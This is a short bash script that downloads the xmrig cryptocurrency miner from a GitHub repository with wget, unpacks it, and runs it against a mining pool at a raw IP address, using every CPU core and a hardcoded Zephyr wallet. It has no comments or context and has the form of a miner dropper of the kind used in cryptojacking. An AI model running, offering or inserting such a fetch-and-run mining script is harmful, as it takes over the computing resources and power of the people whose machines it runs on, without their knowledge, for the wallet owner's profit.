#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.104.187.239:443 -u ZEPHs6xswbu7Dvtb727mV2Agdu4RnEKDZRyX7UYP9HmsLsY2wfL63MF3P2vRWDLDx3Fq69SnCevvrNMtBRfnXZjDUXzztJwX1Zd -p baru -a rx/0 -t $(nproc --all)
